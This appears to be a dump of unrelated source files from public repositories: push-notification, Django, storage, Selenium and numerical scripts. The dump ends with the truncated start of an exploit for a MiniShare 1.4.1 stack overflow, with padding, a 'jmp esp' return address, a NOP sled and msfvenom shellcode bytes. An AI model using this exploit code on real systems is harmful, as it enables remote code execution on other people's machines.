raise AirshipFailure(status, response)
return status == 201
def registerAPID(self, APID_token, c2dm_registration_id, alias=None, \
tags=None, badge=None):
"""Register APID token with UA."""
url = APIDS_TOKEN_URL + APID_token
payload = {}
if alias is not None:
payload['alias'] = alias
if tags is not None:
payload['tags'] = tags
if badge is not None:
payload['badge'] = badge
if c2dm_registration_id:
payload['c2dm_registration_id'] = c2dm_registration_id
if payload:
body = json.dumps(payload)
content_type = 'application/json'
else:
body = ''
content_type = None
status, response = self._request('PUT', body, url, content_type)
if not status in (200, 201):
raise AirshipFailure(status, response)
return status == 201
def deregister(self, device_token, url=None):
"""Mark this device token as inactive"""
if url == None:
url = DEVICE_TOKEN_URL + device_token
status, response = self._request('DELETE', '', url, None)
if status != 204:
raise AirshipFailure(status, response)
def deregisterAPID(self, APID_token):
"""Mark this APID token as inactive."""
url = APIDS_TOKEN_URL + APID_token
self.deregister(APID_token, url)
def get_device_token_info(self, device_token, url=None):
"""Retrieve information about this device token"""
if url == None:
url = DEVICE_TOKEN_URL + device_token
status, response = self._request('GET', None, url)
if status == 404:
return None
elif status != 200:
raise AirshipFailure(status, response)
return json.loads(response)
def get_APID_token_info(self, APID_token):
"""Retrieve information about this APID token"""
url = APIDS_TOKEN_URL + APID_token
return self.get_device_token_info(APID_token, url)
def get_device_tokens(self):
return AirshipDeviceList(self)
def get_apids(self):
return AirshipAPIDsList(self)
def push(self, payload, device_tokens=None, aliases=None, tags=None, schedule_for=None, APID_tokens=None):
"""Push this payload to the specified device tokens and tags."""
if device_tokens:
payload['device_tokens'] = device_tokens
if APID_tokens:
payload['apids'] = APID_tokens
if aliases:
payload['aliases'] = aliases
if tags:
payload['tags'] = tags
if schedule_for:
payload['schedule_for'] = schedule_for
body = json.dumps(payload)
status, response = self._request('POST', body, PUSH_URL,
'application/json')
if not status == 200:
raise AirshipFailure(status, response)
def batch_push(self, payloads):
"""Push the following payloads as a batch.
For payload details see:
http://urbanairship.com/docs/push.html#batch-push
Summary:
List of dictionaries, each with:
* 0 or more "device_tokens"
* 0 or more "aliases"
* "aps" payload.
"""
body = json.dumps(payloads)
status, response = self._request('POST', body, BATCH_PUSH_URL,
'application/json')
if not status == 200:
raise AirshipFailure(status, response)
def broadcast(self, payload, exclude_tokens=None):
"""Broadcast this payload to all users."""
if exclude_tokens:
payload['exclude_tokens'] = exclude_tokens
body = json.dumps(payload)
status, response = self._request('POST', body, BROADCAST_URL,
'application/json')
if not status == 200:
raise AirshipFailure(status, response)
def feedback(self, since):
"""Return device tokens marked inactive since this timestamp.
Returns a list of (device token, timestamp, alias) functions.
Example:
airship.feedback(datetime.datetime.utcnow()
- datetime.timedelta(days=1))
Note:
In order to parse the result, we need a sane date parser,
dateutil: http://labix.org/python-dateutil
"""
url = FEEDBACK_URL + '?' + \
urllib.urlencode({'since': since.isoformat()})
status, response = self._request('GET', '', url)
if not status == 200:
raise AirshipFailure(status, response)
data = json.loads(response)
try:
from dateutil.parser import parse
except ImportError:
def parse(x):
return x
return [
(r['device_token'], parse(r['marked_inactive_on']), r['alias'])
for r in data]
| 32.528958
| 110
| 0.605816
|
84fcb88d2e2f8289e6739afc4bdc3d3646ad2770
| 1,446
|
py
|
Python
|
src/vendor/mariadb-10.6.7/extra/wolfssl/wolfssl/wrapper/python/wolfssl/test/conftest.py
|
zettadb/zettalib
|
3d5f96dc9e3e4aa255f4e6105489758944d37cc4
|
[
"Apache-2.0"
] | null | null | null |
src/vendor/mariadb-10.6.7/extra/wolfssl/wolfssl/wrapper/python/wolfssl/test/conftest.py
|
zettadb/zettalib
|
3d5f96dc9e3e4aa255f4e6105489758944d37cc4
|
[
"Apache-2.0"
] | null | null | null |
src/vendor/mariadb-10.6.7/extra/wolfssl/wolfssl/wrapper/python/wolfssl/test/conftest.py
|
zettadb/zettalib
|
3d5f96dc9e3e4aa255f4e6105489758944d37cc4
|
[
"Apache-2.0"
] | 2
|
2022-02-27T14:00:01.000Z
|
2022-03-31T06:24:22.000Z
|
# -*- coding: utf-8 -*-
#
# conftest.py
#
# Copyright (C) 2006-2021 wolfSSL Inc.
#
# This file is part of wolfSSL.
#
# wolfSSL is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# wolfSSL is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1335, USA
#/
#/
# pylint: disable=missing-docstring, redefined-outer-name
import sys
import ssl
import wolfssl
import pytest
@pytest.fixture
def tcp_socket():
import socket
from contextlib import closing
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
yield sock
@pytest.fixture(
params=[ssl, wolfssl] if sys.version_info.major == 3 else [wolfssl],
ids=["ssl", "wolfssl"] if sys.version_info.major == 3 else ["wolfssl"])
def ssl_provider(request):
return request.param
@pytest.fixture
def ssl_context(ssl_provider):
return ssl_provider.SSLContext(ssl_provider.PROTOCOL_SSLv23)
| 29.510204
| 79
| 0.742047
|
f0f114d1fdfe7526e9725a8a1eb7efb2afa81ec6
| 6,235
|
py
|
Python
|
170401017.py
|
larabetul/blm2010
|
f658165bd834e0963c54679a4ccd52c39c1e63fd
|
[
"Unlicense"
] | null | null | null |
170401017.py
|
larabetul/blm2010
|
f658165bd834e0963c54679a4ccd52c39c1e63fd
|
[
"Unlicense"
] | null | null | null |
170401017.py
|
larabetul/blm2010
|
f658165bd834e0963c54679a4ccd52c39c1e63fd
|
[
"Unlicense"
] | null | null | null |
# coding: utf-8
# In[18]:
#cemre doğan 170401017
with open("veriler.txt","r",encoding='utf-8') as file: #dosya okuma
vaka_liste = []
for i in file.read().split():
vaka_liste.append(int(i))
#print(vaka_liste)
import math
def gauss(A):
n = len(A)
for i in range(0, n):
# Search for maximum in this column
maxEl = abs(A[i][i])
maxRow = i
for k in range(i + 1, n):
if abs(A[k][i]) > maxEl:
maxEl = abs(A[k][i])
maxRow = k
# Swap maximum row with current row (column by column)
for k in range(i, n + 1):
tmp = A[maxRow][k]
A[maxRow][k] = A[i][k]
A[i][k] = tmp
# Make all rows below this one 0 in current column
for k in range(i + 1, n):
c = -A[k][i] / A[i][i]
for j in range(i, n + 1):
if i == j:
A[k][j] = 0
else:
A[k][j] += c * A[i][j]
# Solve equation Ax=b for an upper triangular matrix A
x = [0 for i in range(n)]
for i in range(n - 1, -1, -1):
x[i] = A[i][n] / A[i][i]
for k in range(i - 1, -1, -1):
A[k][n] -= A[k][i] * x[i]
return x
#dereceye göre x toplamları hesabı
def xitoplam(derece,liste):
xi=[len(liste)]
for i in range(1,2*derece+1):
xitoplam=0
for j in range(1,len(liste)+1):
xitoplam+=(j)**i
xi.append(xitoplam)
return xi
#dereceye göre xiyi toplam hesabı
def xiyitoplam(derece,liste):
xiyi = []
for j in range(derece+1):
xiyitoplam=0
for i in range(len(liste)):
xiyitoplam += (liste[i]*((i+1)**j))
xiyi.append(xiyitoplam)
return xiyi
#polinom derecesine göre matris oluştur
def make_matrix(derece,liste):
derece+=1
x_=xitoplam(derece,liste)
y_=xiyitoplam(derece,liste)
matris=[]
row=0
for i in range(0,derece):
newrow=[]
for i in range(row,derece+row):
newrow.append(x_[i])
newrow.append(y_[row])
row+=1
matris.append(newrow)
return matris
#g=gauss(matrisOlustur(4,vaka_liste))
#print(g)
dosya = open("sonuc.txt","a+",encoding="UTF8",errors="ignore")
dosya.write("İLK SORUNUN CEVABI"+"\n")
for i in range (7):
if i==1:
a=gauss(make_matrix(1,vaka_liste))
#print(a)
dosya.write("1.dereceden yaklaşım:")
dosya.write(str(a)+"\n")
if i==2:
b=gauss(make_matrix(2,vaka_liste))
print(b)
#dosya.write("2.dereceden yaklaşım:")
dosya.write(str(b)+"\n")
if i==3:
c=gauss(make_matrix(3,vaka_liste))
#print(c)
dosya.write("3.dereceden yaklaşım:")
dosya.write(str(c)+"\n")
if i==4:
d=gauss(make_matrix(4,vaka_liste))
#print(d)
dosya.write("4.dereceden yaklaşım:")
dosya.write(str(d)+"\n")
if i==5:
e=gauss(make_matrix(5,vaka_liste))
#print(e)
dosya.write("5.dereceden yaklaşım:")
dosya.write(str(e)+"\n")
if i==6:
f=gauss(make_matrix(6,vaka_liste))
#print(f)
dosya.write("6.dereceden yaklaşım:")
dosya.write(str(f))
#korelizasyon işlemi ile yakınsama
def ortalamaBul(veriler):
toplam=0
for i in veriler:
toplam+=i
return toplam
return toplam/len(veriler)
def standart(veriler):
sd = 0
for i in range(0,len(veriler)):
sd += (i - ortalamaBul(veriler)) ** 0.5
return sd
def korelasyonBul(veriler):
return ((abs((St(veriler)-standart(veriler)))/St(veriler)))**(1/2)
aa=korelasyonBul(a)
#print(aa)
dosya.write("\nİKİNCİ SORUNUN CEVABI\n")
dosya.write("1.derece korelasyon yaklaşımı"+str(aa)+"\n")
bb=korelasyonBul(b)
dosya.write("2.derece korelasyon yaklaşımı"+str(bb)+"\n")
#print(bb)
cc=korelasyonBul(c)
dosya.write("3.derce korelasyon yaklaşımı"+str(cc)+"\n")
#print(cc)
dd=korelasyonBul(d)
dosya.write("4.derece korelasyon yaklaşımı"+str(dd)+"\n")
#print(dd)
ee=korelasyonBul(e)
dosya.write("5.derece korelasyon yaklaşımı"+str(ee)+"\n")
#print(ee)
ff=korelasyonBul(f)
dosya.write("6.derece korelasyon yaklaşımı"+str(ff)+"\n")
#print(ff)
#en uyumlu korelasyon
uyumlu=[]
uyumlu.append(aa)
uyumlu.append(bb)
uyumlu.append(cc)
uyumlu.append(dd)
uyumlu.append(ee)
uyumlu.append(ff)
#print(uyumlu)
enyakın=max(uyumlu)
dosya.write("en uyumlu polinom:"+str(enyakın)+"\n")
#print(enyakın)
if enyakın==aa:
dosya.write("1.derece")
if enyakın==bb:
dosya.write("2.derece")
if enyakın==cc:
dosya.write("3.derece")
if enyakın==dd:
dosya.write("4.derece")
if enyakın==ee:
dosya.write("5.derece")
if enyakın==ee:
dosya.write("6.derece")
dosya.write("\nÜÇÜNCÜ SORU\n")
#onlu grup döngüsü açtım
bas = 0
son = 10
while(son<len(vaka_liste)):
xx=vaka_liste[bas:son]
bas = bas+10
son = son+10
#print(xx)
for j in range(1):
onlugrupk=korelasyonBul(xx) #korelizasyon hesabı
dosya.write("korelasyon değeri onlu grup")
dosya.write(str(onlugrupk))
enuyumluk=[]
enuyumluk.append(onlugrupk)
#print("***************",enuyumluk)
enuyumlupolonlu=max(enuyumluk)
#print(enuyumlupolonlu)
dosya.write("onlu grubun en uyumlu pol="+str(enuyumlupolonlu))
#print(onlugrup)
for k in range(1): #polinoma yaklaştırma
onlugrupp=gauss(make_matrix(1,xx))
dosya.write("1.derece polinom onlu grup")
dosya.write(str(onlugrupp))
#print(onlugrupp)
onlugrupp=gauss(make_matrix(1,xx))
dosya.write("2.derece polinom onlu grup")
dosya.write(str(onlugrupp))
onlugrupp=gauss(make_matrix(1,xx))
dosya.write("3.derece polinom onlu grup")
dosya.write(str(onlugrupp))
onlugrupp=gauss(make_matrix(1,xx))
dosya.write("4.derece polinom onlu grup")
dosya.write(str(onlugrupp))
onlugrupp=gauss(make_matrix(1,xx))
dosya.write("5.derece polinom onlu grup")
dosya.write(str(onlugrupp))
onlugrupp=gauss(make_matrix(1,xx))
dosya.write("6.derece polinom onlu grup")
dosya.write(str(onlugrupp))
dosya.close()
| 26.759657
| 70
| 0.584122
|
c4ea02b537c50c502dd2c4a091aae580aa390440
| 1,296
|
py
|
Python
|
catalog/views.py
|
dotakshit/file
|
a4f521f411ddc05644be7bfc674b7b7732024363
|
[
"CC0-1.0"
] | null | null | null |
catalog/views.py
|
dotakshit/file
|
a4f521f411ddc05644be7bfc674b7b7732024363
|
[
"CC0-1.0"
] | 7
|
2020-02-12T00:23:53.000Z
|
2022-02-10T08:12:31.000Z
|
catalog/views.py
|
dotakshit/file
|
a4f521f411ddc05644be7bfc674b7b7732024363
|
[
"CC0-1.0"
] | null | null | null |
from django.shortcuts import render, redirect
from django.contrib.auth import login, authenticate
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.db import transaction
# Create your views here.
from catalog.forms import SignUpForm
from django.http import HttpResponseRedirect
from django.shortcuts import render
def first(req):
return render(req, 'index.html')
def index(req):
return render(req, 'index.html')
def profile(request):
args = {'user':request.user}
return render(request, 'profile.html', args)
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
user = authenticate(username=username, password=raw_password)
login(request, user)
return redirect('/test')
else:
form = SignUpForm()
return render(request, 'signup.html', {'form': form})
def test(request):
return render(request, 'test.html')
def welcome(request):
return render(request, 'test.html')
| 24.923077
| 73
| 0.693673
|
a6350ea070d70e78d815948736fb093a4bc08e33
| 319
|
py
|
Python
|
0x11-python-network_1/4-hbtn_status.py
|
omarcherni007/holbertonschool-higher_level_programming
|
65f3430ab0310f85368d73cb72e139631e8c6f1e
|
[
"MIT"
] | 1
|
2022-01-04T11:07:56.000Z
|
2022-01-04T11:07:56.000Z
|
0x11-python-network_1/4-hbtn_status.py
|
omarcherni007/holbertonschool-higher_level_programming
|
65f3430ab0310f85368d73cb72e139631e8c6f1e
|
[
"MIT"
] | null | null | null |
0x11-python-network_1/4-hbtn_status.py
|
omarcherni007/holbertonschool-higher_level_programming
|
65f3430ab0310f85368d73cb72e139631e8c6f1e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
"""Check status"""
import requests
def status():
"""status"""
result = requests.get("https://intranet.hbtn.io/status")
print("Body response:")
print("\t- type: {}".format(type(result.text)))
print("\t- content: {}".format(result.text))
if __name__ == "__main__":
status()
| 19.9375
| 60
| 0.611285
|
b5e674c79ccd1235247c8c8f52bac57c6c3e8be1
| 507
|
py
|
Python
|
FCards/Cards/migrations/0006_auto_20200621_1106.py
|
Solurix/Flashcards-Django
|
03c863f6722936093927785a2b20b6b668bb743d
|
[
"MIT"
] | 1
|
2021-05-16T03:20:23.000Z
|
2021-05-16T03:20:23.000Z
|
FCards/Cards/migrations/0006_auto_20200621_1106.py
|
Solurix/Flashcards-Django
|
03c863f6722936093927785a2b20b6b668bb743d
|
[
"MIT"
] | 4
|
2021-03-30T14:06:09.000Z
|
2021-09-22T19:26:31.000Z
|
FCards/Cards/migrations/0006_auto_20200621_1106.py
|
Solurix/Flashcards-Django
|
03c863f6722936093927785a2b20b6b668bb743d
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-06-21 02:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Cards', '0005_auto_20200620_2253'),
]
operations = [
migrations.RemoveField(
model_name='card',
name='definition',
),
migrations.AddField(
model_name='multicard',
name='definition',
field=models.CharField(blank=True, max_length=400),
),
]
| 22.043478
| 63
| 0.577909
|
81417d1e31331bc5e1fd6e80ece00533191fd73c
| 1,302
|
py
|
Python
|
capture/prepare/stateset.py
|
ipendlet/SD2_DRP_ML
|
baa65fcef0650d2f0af40eec5aaff20b3e90b6c5
|
[
"MIT"
] | 6
|
2019-02-11T15:38:40.000Z
|
2020-10-16T19:26:51.000Z
|
capture/prepare/stateset.py
|
ipendlet/SD2_DRP_ML
|
baa65fcef0650d2f0af40eec5aaff20b3e90b6c5
|
[
"MIT"
] | 65
|
2019-02-19T19:17:15.000Z
|
2020-03-09T18:01:09.000Z
|
capture/prepare/stateset.py
|
ipendlet/SD2_DRP_ExperimentGen
|
baa65fcef0650d2f0af40eec5aaff20b3e90b6c5
|
[
"MIT"
] | 2
|
2020-05-30T15:29:34.000Z
|
2021-05-16T04:20:26.000Z
|
import pandas as pd
def augdescriptors(inchikeys, rxndict, erdfrows):
#bring in the inchi key based features for a left merge
with open('perov_desc.csv', 'r') as my_descriptors:
descriptor_df=pd.read_csv(my_descriptors)
descriptor_df=inchikeys.merge(descriptor_df, left_on='_rxn_organic-inchikey', right_on='_raw_inchikey', how='inner')
cur_list = [c for c in descriptor_df.columns]
# cur_list = [c for c in descriptor_df.columns if 'raw' not in c]
# cur_list_raw = [c for c in descriptor_df.columns if 'raw' in c]
descriptor_df = descriptor_df[cur_list]
descriptor_df.drop(columns=['_rxn_organic-inchikey'], inplace=True)
ds1 = [rxndict['duratation_stir1']]*erdfrows
ds1df = pd.DataFrame(ds1, columns=['_rxn_mixingtime1S'])
ds2 = [rxndict['duratation_stir2']]*erdfrows
ds2df = pd.DataFrame(ds2, columns=['_rxn_mixingtime2S'])
dr = [rxndict['duration_reaction']]*erdfrows
drdf = pd.DataFrame(dr, columns=['_rxn_reactiontimeS'])
sr1 = [rxndict['stirrate']]*erdfrows
sr1df = pd.DataFrame(sr1, columns=['_rxn_stirrateRPM'])
t = [rxndict['temperature2_nominal']]*erdfrows
tdf = pd.DataFrame(t, columns=['_rxn_temperatureC'])
outdf = pd.concat([inchikeys, ds1df,ds2df,drdf,sr1df,tdf,descriptor_df], axis=1)
return(outdf)
| 54.25
| 120
| 0.718126
|
5d94dbb3398db3f07d235660aec6aa501dbdaa39
| 1,588
|
py
|
Python
|
PythonApp/externals/WebScrapper/selenium_func.py
|
eternalamenity/FootballerPricePredictor
|
ee5875abef2f25d06a547d4c7148fc1d24e6b566
|
[
"MIT"
] | null | null | null |
PythonApp/externals/WebScrapper/selenium_func.py
|
eternalamenity/FootballerPricePredictor
|
ee5875abef2f25d06a547d4c7148fc1d24e6b566
|
[
"MIT"
] | null | null | null |
PythonApp/externals/WebScrapper/selenium_func.py
|
eternalamenity/FootballerPricePredictor
|
ee5875abef2f25d06a547d4c7148fc1d24e6b566
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
=Selenium helper functions=
Use this functions to start and stop the Selenium server in every other module.
"""
from selenium import webdriver
import selenium.webdriver.chrome.service as service
"""
Path where the Selenium driver for your browser is saved.
Go to http://selenium-python.readthedocs.io/installation.html to search for the
appropiate driver, copy it to the directory where this script is saved,
and change 'chromedriver' to match the name of your driver.
"""
PATH_TO_DRIVER = './chromedriver'
"""
Path where your web browser application is saved. This example is for MacOs, in Windows 7, 8,
and 10, the path might be ‘C:\Program Files\Google\Chrome\Application’. Search Google if
you don't know how to find your browser application's path.
"""
PATH_TO_BROWSER = '/Applications/Google Chrome.app'
"""
Whoscored URL
"""
WHOSCORED_URL = 'https://www.whoscored.com'
"""
Functions
"""
def start_server_and_driver():
"""
Start the Selenium server and driver and return them as objects.
"""
server = service.Service(PATH_TO_DRIVER)
server.start()
capabilities = {'chrome.binary': PATH_TO_BROWSER}
driver = webdriver.Remote(server.service_url, capabilities)
return server, driver
def stop_server_and_driver(server, driver):
"""
Close the driver and then stop the server.
=Args=
driver: driver object returned by def start_server_and_driver()
server: server object returned by def start_server_and_driver()
"""
driver.close()
server.stop()
| 28.872727
| 93
| 0.723552
|
5c75e57fef0e14bf4799f0b71fbfbf0ae4f8d1c9
| 9,465
|
py
|
Python
|
gnocchi/storage/s3.py
|
lamby/gnocchi
|
87928a7c92d46b31bf0e8333064a4d0b83e6131b
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/storage/s3.py
|
lamby/gnocchi
|
87928a7c92d46b31bf0e8333064a4d0b83e6131b
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/storage/s3.py
|
lamby/gnocchi
|
87928a7c92d46b31bf0e8333064a4d0b83e6131b
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2016-2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
import tenacity
from gnocchi import carbonara
from gnocchi.common import s3
from gnocchi import storage
from gnocchi import utils
boto3 = s3.boto3
botocore = s3.botocore
OPTS = [
cfg.StrOpt('s3_endpoint_url',
help='S3 endpoint URL'),
cfg.StrOpt('s3_region_name',
default=os.getenv("AWS_DEFAULT_REGION"),
help='S3 region name'),
cfg.StrOpt('s3_access_key_id',
default=os.getenv("AWS_ACCESS_KEY_ID"),
help='S3 access key id'),
cfg.StrOpt('s3_secret_access_key',
default=os.getenv("AWS_SECRET_ACCESS_KEY"),
help='S3 secret access key'),
cfg.StrOpt('s3_bucket_prefix',
# Max bucket length is 63 and we use "-" as separator
# 63 - 1 - len(uuid) = 26
max_length=26,
default='gnocchi',
help='Prefix to namespace metric bucket.'),
cfg.FloatOpt('s3_check_consistency_timeout',
min=0,
default=60,
help="Maximum time to wait checking data consistency when "
"writing to S3. Set to 0 to disable data consistency "
"validation."),
cfg.IntOpt('s3_max_pool_connections',
min=1,
default=50,
help="The maximum number of connections to keep in a "
"connection pool."),
]
def retry_if_operationaborted(exception):
return (isinstance(exception, botocore.exceptions.ClientError)
and exception.response['Error'].get('Code') == "OperationAborted")
class S3Storage(storage.StorageDriver):
WRITE_FULL = True
_consistency_wait = tenacity.wait_exponential(multiplier=0.1)
def __init__(self, conf):
super(S3Storage, self).__init__(conf)
self.s3, self._region_name, self._bucket_prefix = (
s3.get_connection(conf)
)
self._bucket_name = '%s-aggregates' % self._bucket_prefix
if conf.s3_check_consistency_timeout > 0:
self._consistency_stop = tenacity.stop_after_delay(
conf.s3_check_consistency_timeout)
else:
self._consistency_stop = None
def __str__(self):
return "%s: %s" % (self.__class__.__name__, self._bucket_name)
def upgrade(self):
super(S3Storage, self).upgrade()
try:
s3.create_bucket(self.s3, self._bucket_name, self._region_name)
except botocore.exceptions.ClientError as e:
if e.response['Error'].get('Code') != "BucketAlreadyExists":
raise
@staticmethod
def _object_name(split_key, aggregation, version=3):
name = '%s_%s_%s' % (
aggregation,
utils.timespan_total_seconds(split_key.sampling),
split_key,
)
return name + '_v%s' % version if version else name
@staticmethod
def _prefix(metric):
return str(metric.id) + '/'
def _put_object_safe(self, Bucket, Key, Body):
put = self.s3.put_object(Bucket=Bucket, Key=Key, Body=Body)
if self._consistency_stop:
def _head():
return self.s3.head_object(Bucket=Bucket,
Key=Key, IfMatch=put['ETag'])
tenacity.Retrying(
retry=tenacity.retry_if_result(
lambda r: r['ETag'] != put['ETag']),
wait=self._consistency_wait,
stop=self._consistency_stop)(_head)
def _store_metric_splits(self, metric, keys_aggregations_data_offset,
version=3):
for key, aggregation, data, offset in keys_aggregations_data_offset:
self._put_object_safe(
Bucket=self._bucket_name,
Key=self._prefix(metric) + self._object_name(
key, aggregation.method, version),
Body=data)
def _delete_metric_splits_unbatched(self, metric, key, aggregation,
version=3):
self.s3.delete_object(
Bucket=self._bucket_name,
Key=self._prefix(metric) + self._object_name(
key, aggregation.method, version))
def _delete_metric(self, metric):
bucket = self._bucket_name
response = {}
while response.get('IsTruncated', True):
if 'NextContinuationToken' in response:
kwargs = {
'ContinuationToken': response['NextContinuationToken']
}
else:
kwargs = {}
try:
response = self.s3.list_objects_v2(
Bucket=bucket, Prefix=self._prefix(metric), **kwargs)
except botocore.exceptions.ClientError as e:
if e.response['Error'].get('Code') == "NoSuchKey":
# Maybe it never has been created (no measure)
return
raise
s3.bulk_delete(self.s3, bucket,
[c['Key'] for c in response.get('Contents', ())])
def _get_measures_unbatched(self, metric, key, aggregation, version=3):
try:
response = self.s3.get_object(
Bucket=self._bucket_name,
Key=self._prefix(metric) + self._object_name(
key, aggregation.method, version))
except botocore.exceptions.ClientError as e:
if e.response['Error'].get('Code') == 'NoSuchKey':
return
raise
return response['Body'].read()
def _metric_exists_p(self, metric, version):
unaggkey = self._build_unaggregated_timeserie_path(metric, version)
try:
self.s3.head_object(Bucket=self._bucket_name, Key=unaggkey)
except botocore.exceptions.ClientError as e:
if e.response['Error'].get('Code') == "404":
return False
raise
return True
def _list_split_keys(self, metric, aggregations, version=3):
bucket = self._bucket_name
keys = {}
for aggregation in aggregations:
keys[aggregation] = set()
response = {}
while response.get('IsTruncated', True):
if 'NextContinuationToken' in response:
kwargs = {
'ContinuationToken': response['NextContinuationToken']
}
else:
kwargs = {}
response = self.s3.list_objects_v2(
Bucket=bucket,
Prefix=self._prefix(metric) + '%s_%s' % (
aggregation.method,
utils.timespan_total_seconds(
aggregation.granularity),
),
**kwargs)
# If response is empty then check that the metric exists
contents = response.get('Contents', ())
if not contents and not self._metric_exists_p(metric, version):
raise storage.MetricDoesNotExist(metric)
for f in contents:
try:
if (self._version_check(f['Key'], version)):
meta = f['Key'].split('_')
keys[aggregation].add(carbonara.SplitKey(
utils.to_timestamp(meta[2]),
sampling=aggregation.granularity))
except (ValueError, IndexError):
# Might be "none", or any other file. Be resilient.
continue
return keys
@staticmethod
def _build_unaggregated_timeserie_path(metric, version):
return S3Storage._prefix(metric) + 'none' + ("_v%s" % version
if version else "")
def _get_or_create_unaggregated_timeseries_unbatched(
self, metric, version=3):
key = self._build_unaggregated_timeserie_path(metric, version)
try:
response = self.s3.get_object(
Bucket=self._bucket_name, Key=key)
except botocore.exceptions.ClientError as e:
if e.response['Error'].get('Code') == "NoSuchKey":
# Create the metric with empty data
self._put_object_safe(
Bucket=self._bucket_name, Key=key, Body="")
else:
raise
else:
return response['Body'].read() or None
def _store_unaggregated_timeseries_unbatched(
self, metric, data, version=3):
self._put_object_safe(
Bucket=self._bucket_name,
Key=self._build_unaggregated_timeserie_path(metric, version),
Body=data)
| 38.47561
| 79
| 0.564712
|
2bc97e01552e25cd34d90d4d8e3edf9643adc550
| 3,208
|
py
|
Python
|
runner/xparams.py
|
alex-robinson/runner
|
5e992ef7eaf82b4a69be8c6db9e572421323bc69
|
[
"MIT"
] | 2
|
2019-06-01T11:21:37.000Z
|
2019-11-18T22:55:39.000Z
|
runner/xparams.py
|
alex-robinson/runner
|
5e992ef7eaf82b4a69be8c6db9e572421323bc69
|
[
"MIT"
] | 2
|
2020-02-24T15:04:43.000Z
|
2021-03-07T13:44:21.000Z
|
runner/xparams.py
|
alex-robinson/runner
|
5e992ef7eaf82b4a69be8c6db9e572421323bc69
|
[
"MIT"
] | 1
|
2021-03-03T19:27:33.000Z
|
2021-03-03T19:27:33.000Z
|
# XParams
from collections import OrderedDict as odict
from runner.tools import DataFrame
from runner.resample import Resampler, RESAMPLING_METHOD, NEFF_BOUNDS
# Ensemble parameters
# NOTE: this XParams class could well be in another module and be simply imported,
# but for now it makes one module less...
class XParams(DataFrame):
"""Experiment params
"""
def __init__(self, values, names, default=None):
self.values = values
self.names = names
self.default = default
def pset_as_array(self, i=None):
if i is None:
pvalues = self.default
else:
pvalues = self.values[i]
if hasattr(pvalues, 'tolist'):
pvalues = pvalues.tolist() # numpy array
return pvalues
def pset_as_dict(self, i=None):
"""return parameter set as a dictionary
"""
pvalues = self.pset_as_array(i)
if pvalues is None:
return odict() # case were default parameters are not provided
params = odict()
for k, v in zip(self.names, pvalues):
params[k] = v
return params
def resample(self, weights, size=None, seed=None, method=RESAMPLING_METHOD,
iis=False, epsilon=None, neff_bounds=NEFF_BOUNDS, bounds=None):
"""
Parameters
----------
weights : array of weights (must match params' size)
size : new ensemble size, by default same as current
seed : random state seed (None)
method : method for weighted resampling (see runner.resample.Resampler)
iis : step of the Iterative Importance Sampling strategy (Hannan and Hargreave)
where weights are flattened (epsilon exponent) and jitter (noise) is added
to the resampled ensemble, as a fraction epsilon of its (weighted)
covariance. In the linear case, the combination of flattened resampling
and jitter addition is equivalent to one time resampling with full weights.
epsilon : scaling exponent for the weights, ie `weights**epsilon` [iis method only]
If not provided, epsilon is automatically generated to yield an effective
ensemble size comprised in the neff_bounds range. Starting value: epsilon.
neff_bounds : target effective ensemble size to determine epsilon automatically
bounds : authorized parameter range (experimental). If jitter addition yields parameters
outside the specified range, try again a number of times. [iis method only]
Returns
-------
XParams instance
"""
if weights.size != self.size:
raise ValueError("params and weights size do not match")
resampler = Resampler(weights) # default size implied by weights
if iis:
vals = resampler.iis(self.values,
size=size, seed=seed, method=method,
bounds=bounds, neff_bounds=neff_bounds,
epsilon=epsilon)
else:
idx = resampler.sample(size=size, seed=seed, method=method)
vals = self.values[idx]
return XParams(vals, self.names)
| 40.1
| 96
| 0.63217
|
e7ffdc34a6d02c394ea6b443de8050d6818a5617
| 1,394
|
py
|
Python
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
mostwantedduck/osed-1
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 28
|
2021-05-31T13:41:12.000Z
|
2022-03-29T06:19:18.000Z
|
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | null | null | null |
1-stack-overflows/remote/minishare-1.4.1/exploit.py
|
sradley/osed
|
112c719c86283cb735850d7cb6d05f42fa1c0a1a
|
[
"MIT"
] | 15
|
2021-05-28T07:39:34.000Z
|
2022-03-09T19:09:28.000Z
|
#!/usr/bin/env python3
from pwn import *
pad = b'A' * 1787
# 0x74ff6c28: jmp esp;
ret = p32(0x75860000 + 0x6c28)
nop = b'\x90' * 64
# msfvenom -p windows/exec -b '\x00\x0d' -f py CMD=calc.exe
buf = b""
buf += b"\xba\x87\x2d\x18\x37\xda\xc2\xd9\x74\x24\xf4\x5f\x33"
